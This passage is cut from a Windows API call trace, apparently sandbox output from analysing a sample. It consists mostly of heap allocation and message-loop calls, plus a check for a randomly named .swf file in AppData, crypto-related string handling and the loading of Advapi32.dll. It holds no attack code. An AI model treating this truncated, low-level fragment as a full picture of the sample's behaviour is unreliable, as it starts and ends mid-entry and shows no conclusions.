Size=0x20) returned 0x2e79310 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0238.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0238.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0238.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.732] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0238.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.735] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.735] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.736] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/TXuB6gyi89__NoT9.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc323cf70, ftCreationTime.dwHighDateTime=0x1d5e251, ftLastAccessTime.dwLowDateTime=0x7f105300, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x7f105300, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="TXuB6gyi89__NoT9.swf", cAlternateFileName="TXUB6G~1.SWF")) returned 0xa87250 [0238.737] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0238.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.737] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0238.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.738] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0238.738] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.738] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0238.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.739] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0238.739] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0238.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.740] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0238.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.742] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.742] RtlAllocateHeap 